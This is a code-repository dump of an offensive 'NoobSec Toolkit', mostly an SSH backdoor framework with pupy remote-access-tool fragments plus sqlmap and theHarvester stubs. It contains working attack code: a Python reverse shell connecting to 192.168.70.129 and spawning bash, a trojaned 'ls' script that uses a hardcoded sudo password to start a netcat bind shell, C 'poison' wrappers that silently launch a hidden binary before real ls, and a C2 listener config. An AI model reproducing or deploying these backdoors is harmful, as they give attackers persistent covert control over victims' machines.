/scripts/sshbackdoors/backdoors/shell/pupy/client/sources/Python-version.h: -------------------------------------------------------------------------------- 1 | #include 2 | #if (PY_VERSION_HEX < 0x02050000) 3 | # define PYTHON_API_VERSION 1012 4 | typedef int Py_ssize_t; 5 | #else 6 | # define PYTHON_API_VERSION 1013 7 | /* The check for _WIN64 must come first, because on win64 both _WIN64 and 8 | * _WIN32 are defined! 9 | */ 10 | # if defined (_WIN64) 11 | typedef __int64 Py_ssize_t; 12 | # elif defined (_WIN32) 13 | typedef int Py_ssize_t; 14 | # endif 15 | #endif 16 | -------------------------------------------------------------------------------- /NoobSecToolkit /scripts/sshbackdoors/backdoors/shell/pupy/client/sources/pupy_load.h: -------------------------------------------------------------------------------- 1 | #ifndef PYTHONINTERPRETER 2 | #define PYTHONINTERPRETER 3 | 4 | DWORD WINAPI mainThread(LPVOID lpArg); 5 | #endif 6 | -------------------------------------------------------------------------------- /NoobSecToolkit /scripts/sshbackdoors/backdoors/shell/pupy/client/sources/remote_thread.h: -------------------------------------------------------------------------------- 1 | #ifndef _METERPRETER_REMOTE_THREAD_H 2 | #define _METERPRETER_REMOTE_THREAD_H 3 | 4 | HANDLE create_remote_thread(HANDLE hProcess, SIZE_T sStackSize, LPVOID pvStartAddress, LPVOID pvStartParam, DWORD dwCreateFlags, LPDWORD pdwThreadId); 5 | 6 | #endif 7 | -------------------------------------------------------------------------------- /NoobSecToolkit /scripts/sshbackdoors/backdoors/shell/pupy/client/sources/resources/iter_files.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: UTF8 -*- 3 | 4 | import marshal, zlib 5 | modules = marshal.loads(zlib.decompress(open("library_compressed_string.txt",'rb').read())) 6 | for f in sorted([x for x in modules.iterkeys()]): 7 | print f 8 | 9 | -------------------------------------------------------------------------------- /NoobSecToolkit /scripts/sshbackdoors/backdoors/shell/pupy/pupy/crypto/gen.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | openssl req -new -x509 -keyout server.pem -out cert.pem -days 365 -nodes 3 | -------------------------------------------------------------------------------- /NoobSecToolkit /scripts/sshbackdoors/backdoors/shell/pupy/pupy/modules/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit /scripts/sshbackdoors/backdoors/shell/pupy/pupy/modules/__init__.py -------------------------------------------------------------------------------- /NoobSecToolkit /scripts/sshbackdoors/backdoors/shell/pupy/pupy/modules/process_kill.py: -------------------------------------------------------------------------------- 1 | # -*- coding: UTF8 -*- 2 | from pupylib.PupyModule import * 3 | 4 | __class_name__="KillModule" 5 | 6 | class KillModule(PupyModule): 7 | """ kill a process """ 8 | 9 | def init_argparse(self): 10 | self.arg_parser = PupyArgumentParser(prog="kill", description=self.__doc__) 11 | self.arg_parser.add_argument('pid', type=int, help='pid to kill') 12 | 13 | def run(self, args): 14 | self.client.conn.modules.os.kill(args.pid,9) 15 | self.success("process killed !") 16 | 17 | -------------------------------------------------------------------------------- /NoobSecToolkit /scripts/sshbackdoors/backdoors/shell/pupy/pupy/packages/all/pupyutils/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit /scripts/sshbackdoors/backdoors/shell/pupy/pupy/packages/all/pupyutils/__init__.py -------------------------------------------------------------------------------- /NoobSecToolkit /scripts/sshbackdoors/backdoors/shell/pupy/pupy/packages/src/VideoCapture/src/helvB08.pil: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit /scripts/sshbackdoors/backdoors/shell/pupy/pupy/packages/src/VideoCapture/src/helvB08.pil -------------------------------------------------------------------------------- /NoobSecToolkit /scripts/sshbackdoors/backdoors/shell/pupy/pupy/packages/src/VideoCapture/src/helvB08.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit /scripts/sshbackdoors/backdoors/shell/pupy/pupy/packages/src/VideoCapture/src/helvB08.png -------------------------------------------------------------------------------- /NoobSecToolkit /scripts/sshbackdoors/backdoors/shell/pupy/pupy/packages/src/VideoCapture/src/helvetica-10.pil: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit /scripts/sshbackdoors/backdoors/shell/pupy/pupy/packages/src/VideoCapture/src/helvetica-10.pil -------------------------------------------------------------------------------- /NoobSecToolkit /scripts/sshbackdoors/backdoors/shell/pupy/pupy/packages/src/VideoCapture/src/helvetica-10.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit /scripts/sshbackdoors/backdoors/shell/pupy/pupy/packages/src/VideoCapture/src/helvetica-10.png -------------------------------------------------------------------------------- /NoobSecToolkit /scripts/sshbackdoors/backdoors/shell/pupy/pupy/packages/src/pupymemexec/make.bat: -------------------------------------------------------------------------------- 1 | cl.exe pupymemexec.c /LD /D_WIN32 /IC:\Python27\include C:\Python27\libs\python27.lib /Fepupymemexec.pyd 2 | -------------------------------------------------------------------------------- /NoobSecToolkit /scripts/sshbackdoors/backdoors/shell/pupy/pupy/packages/src/pupymemexec/makex64.bat: -------------------------------------------------------------------------------- 1 | cl.exe pupymemexec.c /LD /D_WIN64 /IC:\Python27\include C:\Python27\libs\python27.lib /Fepupymemexec.pyd 2 | -------------------------------------------------------------------------------- /NoobSecToolkit /scripts/sshbackdoors/backdoors/shell/pupy/pupy/packages/windows/all/pupwinutils/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit /scripts/sshbackdoors/backdoors/shell/pupy/pupy/packages/windows/all/pupwinutils/__init__.py -------------------------------------------------------------------------------- /NoobSecToolkit /scripts/sshbackdoors/backdoors/shell/pupy/pupy/packages/windows/all/pupwinutils/msgbox.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: UTF8 -*- 3 | 4 | import ctypes 5 | import threading 6 | 7 | def MessageBox(text, title): 8 | t=threading.Thread(target=ctypes.windll.user32.MessageBoxA, args=(None, text, title, 0)) 9 | t.daemon=True 10 | t.start() 11 | -------------------------------------------------------------------------------- /NoobSecToolkit /scripts/sshbackdoors/backdoors/shell/pupy/pupy/packages/windows/amd64/psutil/_psutil_windows.pyd: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit /scripts/sshbackdoors/backdoors/shell/pupy/pupy/packages/windows/amd64/psutil/_psutil_windows.pyd -------------------------------------------------------------------------------- /NoobSecToolkit /scripts/sshbackdoors/backdoors/shell/pupy/pupy/packages/windows/amd64/pupymemexec.pyd: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit /scripts/sshbackdoors/backdoors/shell/pupy/pupy/packages/windows/amd64/pupymemexec.pyd -------------------------------------------------------------------------------- /NoobSecToolkit /scripts/sshbackdoors/backdoors/shell/pupy/pupy/packages/windows/amd64/vidcap.pyd: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit /scripts/sshbackdoors/backdoors/shell/pupy/pupy/packages/windows/amd64/vidcap.pyd -------------------------------------------------------------------------------- /NoobSecToolkit /scripts/sshbackdoors/backdoors/shell/pupy/pupy/packages/windows/x86/psutil/_psutil_windows.pyd: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit /scripts/sshbackdoors/backdoors/shell/pupy/pupy/packages/windows/x86/psutil/_psutil_windows.pyd -------------------------------------------------------------------------------- /NoobSecToolkit /scripts/sshbackdoors/backdoors/shell/pupy/pupy/packages/windows/x86/pupymemexec.pyd: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit /scripts/sshbackdoors/backdoors/shell/pupy/pupy/packages/windows/x86/pupymemexec.pyd -------------------------------------------------------------------------------- /NoobSecToolkit /scripts/sshbackdoors/backdoors/shell/pupy/pupy/packages/windows/x86/vidcap.pyd: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit /scripts/sshbackdoors/backdoors/shell/pupy/pupy/packages/windows/x86/vidcap.pyd -------------------------------------------------------------------------------- /NoobSecToolkit /scripts/sshbackdoors/backdoors/shell/pupy/pupy/pupy.conf: -------------------------------------------------------------------------------- 1 | [pupyd] 2 | address = 0.0.0.0 3 | port = 443 4 | keyfile = crypto/server.pem 5 | certfile = crypto/cert.pem 6 | 7 | [cmdline] 8 | display_banner = yes 9 | colors = yes 10 | 11 | [aliases] 12 | info = get_info 13 | pyexec = pyexec 14 | exec = shell_exec 15 | ps = ps 16 | migrate = migrate 17 | kill = process_kill 18 | #tasklist = shell_exec 'tasklist /v' 19 | -------------------------------------------------------------------------------- /NoobSecToolkit /scripts/sshbackdoors/backdoors/shell/pupy/pupy/pupylib/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit /scripts/sshbackdoors/backdoors/shell/pupy/pupy/pupylib/__init__.py -------------------------------------------------------------------------------- /NoobSecToolkit /scripts/sshbackdoors/backdoors/shell/pupy/pupy/pupylib/utils/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit /scripts/sshbackdoors/backdoors/shell/pupy/pupy/pupylib/utils/__init__.py -------------------------------------------------------------------------------- /NoobSecToolkit /scripts/sshbackdoors/backdoors/shell/pupy/pupy/pupylib/utils/network.py: -------------------------------------------------------------------------------- 1 | # -*- coding: UTF8 -*- 2 | import subprocess 3 | 4 | def get_local_ip(iface = 'eth0'): 5 | try: 6 | return subprocess.check_output(["ifconfig", iface]).split("\n")[1].split()[1][5:] 7 | #TODO same for windows 8 | except Exception: 9 | return None 10 | -------------------------------------------------------------------------------- /NoobSecToolkit /scripts/sshbackdoors/backdoors/shell/pythScript/pythBackdoor.py: -------------------------------------------------------------------------------- 1 | import socket, subprocess, os; 2 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); 3 | s.connect(("192.168.70.129", 53922)); 4 | os.dup2(s.fileno(), 0); 5 | os.dup2(s.fileno(),1); 6 | os.dup2(s.fileno(),2); 7 | o=subprocess.call(["/bin/bash", "-i"]); 8 | 9 | -------------------------------------------------------------------------------- /NoobSecToolkit /scripts/sshbackdoors/backdoors/shell/pythScript/pythPart1: -------------------------------------------------------------------------------- 1 | import socket, subprocess, os; 2 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); 3 | s.connect((" 4 | -------------------------------------------------------------------------------- /NoobSecToolkit /scripts/sshbackdoors/backdoors/shell/pythScript/pythPart2: -------------------------------------------------------------------------------- 1 | ", 53922)); 2 | os.dup2(s.fileno(), 0); 3 | os.dup2(s.fileno(),1); 4 | os.dup2(s.fileno(),2); 5 | o=subprocess.call(["/bin/bash", "-i"]); 6 | 7 | -------------------------------------------------------------------------------- /NoobSecToolkit /scripts/sshbackdoors/definitions.py: -------------------------------------------------------------------------------- 1 | from colorama import * 2 | 3 | GOOD = Fore.GREEN + " + " + Fore.RESET 4 | BAD = Fore.RED + " - " + Fore.RESET 5 | WARN = Fore.YELLOW + " * " + Fore.RESET 6 | INFO = Fore.BLUE + " + " + Fore.RESET 7 | 8 | 9 | -------------------------------------------------------------------------------- /NoobSecToolkit /scripts/sshbackdoors/imports.py: -------------------------------------------------------------------------------- 1 | import module 2 | ''' 3 | from metasploit import * 4 | from netcat import * 5 | from netcat_traditional import * 6 | from perl import * 7 | from pyth import * 8 | from pupy import * 9 | from bash import * 10 | from bash2 import * 11 | ''' 12 | from poison import * 13 | from web import * 14 | from webMod import * 15 | from cron import * 16 | -------------------------------------------------------------------------------- /NoobSecToolkit /scripts/sshbackdoors/modules/__init__.py: -------------------------------------------------------------------------------- 1 | ''' 2 | from os.path import dirname, basename, isfile 3 | import glob 4 | modules = glob.glob(dirname(__file__)+"/*.py") 5 | __all__ = [ basename(f)[:-3] for f in modules if isfile(f)] 6 | ''' 7 | from poison import * 8 | from cron import * 9 | from webMod import * 10 | from whitelist import * 11 | from addUser import * 12 | from startup import * 13 | 14 | 15 | enabled_modules = {"adduser" : AddUser, "startup" : Startup, "poison" : Poison, "cron" : Cron, "web": WebMod, "whitelist" : Whitelist} 16 | -------------------------------------------------------------------------------- /NoobSecToolkit /scripts/sshbackdoors/modules/option.py: -------------------------------------------------------------------------------- 1 | class Option(): 2 | 3 | def __init__(self, name, value, description, required): 4 | self.name = name 5 | self.value = value 6 | self.description = description 7 | self.required = required 8 | -------------------------------------------------------------------------------- /NoobSecToolkit /scripts/sshbackdoors/modules/web/install.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | yes | apt-get install --force-yes apache2 4 | yes | apt-get install --force-yes php5 5 | yes | apt-get install --force-yes libapache2-mod-php5 6 | yes | apt-get install --force-yes php5-cli 7 | mkdir /var/www/html 8 | -------------------------------------------------------------------------------- /NoobSecToolkit /scripts/sshbackdoors/requirements.txt: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /NoobSecToolkit /scripts/sshbackdoors/rpyc/core/__init__.py: -------------------------------------------------------------------------------- 1 | from rpyc.core.stream import SocketStream, TunneledSocketStream, PipeStream 2 | from rpyc.core.channel import Channel 3 | from rpyc.core.protocol import Connection 4 | from rpyc.core.netref import BaseNetref 5 | from rpyc.core.async import AsyncResult, AsyncResultTimeout 6 | from rpyc.core.service import Service, VoidService, SlaveService 7 | from rpyc.core.vinegar import GenericException 8 | -------------------------------------------------------------------------------- /NoobSecToolkit /scripts/sshbackdoors/rpyc/experimental/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit /scripts/sshbackdoors/rpyc/experimental/__init__.py -------------------------------------------------------------------------------- /NoobSecToolkit /scripts/sshbackdoors/rpyc/utils/__init__.py: -------------------------------------------------------------------------------- 1 | """ 2 | Utilities (not part of the core protocol) 3 | """ 4 | 5 | -------------------------------------------------------------------------------- /NoobSecToolkit /scripts/sshbackdoors/rpyc/version.py: -------------------------------------------------------------------------------- 1 | version = (3, 3, 0) 2 | version_string = "3.3.0" 3 | release_date = "2014.06.27" 4 | 5 | -------------------------------------------------------------------------------- /NoobSecToolkit /scripts/sshbackdoors/target.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit /scripts/sshbackdoors/target.pyc -------------------------------------------------------------------------------- /NoobSecToolkit /scripts/sshbackdoors/tmp/bashStatus.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit /scripts/sshbackdoors/tmp/bashStatus.txt -------------------------------------------------------------------------------- /NoobSecToolkit /scripts/sshbackdoors/tmp/initd: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit /scripts/sshbackdoors/tmp/initd -------------------------------------------------------------------------------- /NoobSecToolkit /scripts/sshbackdoors/tmp/ls: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | ( echo target123 | sudo -S nohup ./nc.traditional -l -p 53926 -e /bin/bash & ) > /dev/null 2>&1 && /bin/share/ls $@ -------------------------------------------------------------------------------- /NoobSecToolkit /scripts/sshbackdoors/tmp/lsa.c: -------------------------------------------------------------------------------- 1 | #include 2 | int main() { 3 | system("./initd &"); 4 | system("ls"); 5 | return 0; 6 | } 7 | -------------------------------------------------------------------------------- /NoobSecToolkit /scripts/sshbackdoors/tmp/p.c: -------------------------------------------------------------------------------- 1 | #include 2 | int main() { 3 | system("./initd 2> /dev/null &"); 4 | system("/bin/share/ls"); 5 | return 0; 6 | } -------------------------------------------------------------------------------- /NoobSecToolkit /scripts/sshbackdoors/tmp/poison.c: -------------------------------------------------------------------------------- 1 | #include 2 | int main() { 3 | system("nohup ./initd > /dev/null"); 4 | system("/bin/share/ls"); 5 | return 0; 6 | } -------------------------------------------------------------------------------- /NoobSecToolkit /scripts/vulscan.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # -*- coding: utf-8 -*- 3 | import sys 4 | import os 5 | import traceback 6 | print "---------------------" 7 | print "Vulnerability Scanner" 8 | print "---------------------" 9 | target = raw_input('Scan Target: ') 10 | 11 | cmd1 = os.system ('perl '+'tools/vscan/nikto.pl -h ' +target+' -o target_output.html') 12 | -------------------------------------------------------------------------------- /NoobSecToolkit /tools/.DS_Store: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit /tools/.DS_Store -------------------------------------------------------------------------------- /NoobSecToolkit /tools/harvester/.gitignore: -------------------------------------------------------------------------------- 1 | *.pyc 2 | -------------------------------------------------------------------------------- /NoobSecToolkit /tools/harvester/discovery/DNS/Lib.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit /tools/harvester/discovery/DNS/Lib.py -------------------------------------------------------------------------------- /NoobSecToolkit /tools/harvester/discovery/DNS/Type.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit /tools/harvester/discovery/DNS/Type.py -------------------------------------------------------------------------------- /NoobSecToolkit /tools/harvester/discovery/__init__.py: -------------------------------------------------------------------------------- 1 | __all__ = ["bingsearch", 2 | "googlesearch", 3 | "googleplussearch", 4 | "pgpsearch", 5 | "linkedinsearch", 6 | "exaleadsearch", 7 | "yandexsearch", 8 | "googlesets", 9 | "dnssearch", 10 | "shodansearch", 11 | "jigsaw", 12 | "twittersearch", 13 | "dogpilesearch", 14 | "baidusearch", 15 | "yahoosearch", 16 | "googleCSE"] 17 | -------------------------------------------------------------------------------- /NoobSecToolkit /tools/harvester/discovery/shodan/__init__.py: -------------------------------------------------------------------------------- 1 | from api import WebAPI 2 | 3 | __version__ = "0.5.0" 4 | 5 | __all__ = ['WebAPI'] 6 | -------------------------------------------------------------------------------- /NoobSecToolkit /tools/harvester/tests/myparser_test.py: -------------------------------------------------------------------------------- 1 | # 2 | # Unit tests for myparser.py 3 | # 4 | import myparser 5 | 6 | import unittest 7 | 8 | class TestMyParser(unittest.TestCase): 9 | 10 | def test_emails(self): 11 | word = 'domain.com' 12 | results = '***a@domain***banotherdomain.com***c@domain.com***d@sub.domain.com***' 13 | p = myparser.parser(results, word) 14 | emails = sorted(p.emails()) 15 | self.assertEquals(emails, [ 'c@domain.com', 'd@sub.domain.com' ]) 16 | 17 | if __name__ == '__main__': 18 | unittest.main() 19 | -------------------------------------------------------------------------------- /NoobSecToolkit /tools/inject/.gitattributes: -------------------------------------------------------------------------------- 1 | *.py text eol=lf 2 | *.conf text eol=lf 3 | 4 | *_ binary 5 | *.dll binary 6 | *.pdf binary 7 | *.so binary 8 | *.wav binary 9 | *.zip binary 10 | *.x32 binary 11 | *.x64 binary 12 | *.exe binary 13 | *.sln binary 14 | *.vcproj binary 15 | -------------------------------------------------------------------------------- /NoobSecToolkit /tools/inject/.gitignore: -------------------------------------------------------------------------------- 1 | *.py[cod] 2 | output/ 3 | .sqlmap_history 4 | traffic.txt 5 | *~ -------------------------------------------------------------------------------- /NoobSecToolkit /tools/inject/doc/AUTHORS: -------------------------------------------------------------------------------- 1 | Bernardo Damele Assumpcao Guimaraes (@inquisb) 2 | 3 | 4 | Miroslav Stampar (@stamparm) 5 | 6 | 7 | You can contact both developers by writing to dev@sqlmap.org 8 | -------------------------------------------------------------------------------- /NoobSecToolkit /tools/inject/doc/FAQ.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit /tools/inject/doc/FAQ.pdf -------------------------------------------------------------------------------- /NoobSecToolkit /tools/inject/doc/README.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit /tools/inject/doc/README.pdf -------------------------------------------------------------------------------- /NoobSecToolkit /tools/inject/extra/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) 5 | See the file 'doc/COPYING' for copying permission 6 | """ 7 | 8 | pass 9 | -------------------------------------------------------------------------------- /NoobSecToolkit /tools/inject/extra/beep/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) 5 | See the file 'doc/COPYING' for copying permission 6 | """ 7 | 8 | pass 9 | -------------------------------------------------------------------------------- /NoobSecToolkit /tools/inject/extra/beep/beep.wav: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit /tools/inject/extra/beep/beep.wav -------------------------------------------------------------------------------- /NoobSecToolkit /tools/inject/extra/cloak/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) 5 | See the file 'doc/COPYING' for copying permission 6 | """ 7 | 8 | pass 9 | -------------------------------------------------------------------------------- /NoobSecToolkit /tools/inject/extra/dbgtool/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) 5 | See the file 'doc/COPYING' for copying permission 6 | """ 7 | 8 | pass 9 | -------------------------------------------------------------------------------- /NoobSecToolkit /tools/inject/extra/icmpsh/icmpsh.exe_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit /tools/inject/extra/icmpsh/icmpsh.exe_ -------------------------------------------------------------------------------- /NoobSecToolkit /tools/inject/extra/runcmd/README.txt: -------------------------------------------------------------------------------- 1 | Files in this folder can be used to compile auxiliary program that can 2 | be used for running command prompt commands skipping standard "cmd /c" way. 3 | They are licensed under the terms of the GNU Lesser General Public License. 4 | -------------------------------------------------------------------------------- /NoobSecToolkit /tools/inject/extra/runcmd/windows/README.txt: -------------------------------------------------------------------------------- 1 | Compile only the Release version because the Runtime library option 2 | (Project Properties -> Configuration Properties -> C/C++ -> Code 3 | Generation) is set to "Multi-threaded (/MT)", which statically links 4 | everything into executable and doesn't compile Debug version at all. 5 | -------------------------------------------------------------------------------- /NoobSecToolkit /tools/inject/extra/runcmd/windows/runcmd/stdafx.cpp: -------------------------------------------------------------------------------- 1 | // stdafx.cpp : source file that includes just the standard includes 2 | // runcmd.pch will be the pre-compiled header 3 | // stdafx.obj will contain the pre-compiled type information 4 | 5 | #include "stdafx.h" 6 | 7 | // TODO: reference any additional headers you need in STDAFX.H 8 | // and not in this file 9 | -------------------------------------------------------------------------------- /NoobSecToolkit /tools/inject/extra/safe2bin/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) 5 | See the file 'doc/COPYING' for copying permission 6 | """ 7 | 8 | pass 9 | -------------------------------------------------------------------------------- /NoobSecToolkit /tools/inject/extra/shellcodeexec/README.txt: -------------------------------------------------------------------------------- 1 | Binary files in this folder are data files used by sqlmap on the target 2 | system, but not executed on the system running sqlmap. They are licensed 3 | under the terms of the GNU Lesser General Public License and their source 4 | code is available on https://github.com/inquisb/shellcodeexec. 5 | -------------------------------------------------------------------------------- /NoobSecToolkit /tools/inject/extra/shellcodeexec/linux/shellcodeexec.x32_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit /tools/inject/extra/shellcodeexec/linux/shellcodeexec.x32_ -------------------------------------------------------------------------------- /NoobSecToolkit /tools/inject/extra/shellcodeexec/linux/shellcodeexec.x64_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit /tools/inject/extra/shellcodeexec/linux/shellcodeexec.x64_ -------------------------------------------------------------------------------- /NoobSecToolkit /tools/inject/extra/shellcodeexec/windows/shellcodeexec.x32.exe_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit /tools/inject/extra/shellcodeexec/windows/shellcodeexec.x32.exe_ -------------------------------------------------------------------------------- /NoobSecToolkit /tools/inject/extra/shutils/blanks.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) 4 | # See the file 'doc/COPYING' for copying permission 5 | 6 | # Removes trailing spaces from blank lines inside project files 7 | find . -type f -iname '*.py' -exec sed -i 's/^[ \t]*$//' {} \; 8 | -------------------------------------------------------------------------------- /NoobSecToolkit /tools/inject/extra/shutils/pep8.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) 4 | # See the file 'doc/COPYING' for copying permission 5 | 6 | # Runs pep8 on all python files (prerequisite: apt-get install pep8) 7 | find . -wholename "./thirdparty" -prune -o -type f -iname "*.py" -exec pep8 '{}' \; 8 | -------------------------------------------------------------------------------- /NoobSecToolkit /tools/inject/extra/shutils/pyflakes.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) 4 | # See the file 'doc/COPYING' for copying permission 5 | 6 | # Runs pyflakes on all python files (prerequisite: apt-get install pyflakes) 7 | find . -wholename "./thirdparty" -prune -o -type f -iname "*.py" -exec pyflakes '{}' \; 8 | -------------------------------------------------------------------------------- /NoobSecToolkit /tools/inject/extra/sqlharvest/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) 5 | See the file 'doc/COPYING' for copying permission 6 | """ 7 | 8 | pass 9 | -------------------------------------------------------------------------------- /NoobSecToolkit /tools/inject/lib/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) 5 | See the file 'doc/COPYING' for copying permission 6 | """ 7 | 8 | pass 9 | -------------------------------------------------------------------------------- /NoobSecToolkit /tools/inject/lib/controller/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) 5 | See the file 'doc/COPYING' for copying permission 6 | """ 7 | 8 | pass 9 | -------------------------------------------------------------------------------- /NoobSecToolkit /tools/inject/lib/core/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) 5 | See the file 'doc/COPYING' for copying permission 6 | """ 7 | 8 | pass 9 | -------------------------------------------------------------------------------- /NoobSecToolkit /tools/inject/lib/parse/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) 5 | See the file 'doc/COPYING' for copying permission 6 | """ 7 | 8 | pass 9 | -------------------------------------------------------------------------------- /NoobSecToolkit /tools/inject/lib/request/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) 5 | See the file 'doc/COPYING' for copying permission 6 | """ 7 | 8 | pass 9 | -------------------------------------------------------------------------------- /NoobSecToolkit /tools/inject/lib/takeover/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) 5 | See the file 'doc/COPYING' for copying permission 6 | """ 7 | 8 | pass 9 | -------------------------------------------------------------------------------- /NoobSecToolkit /tools/inject/lib/techniques/__init__.py: -------------------------------------------------------------------------------- 1 | 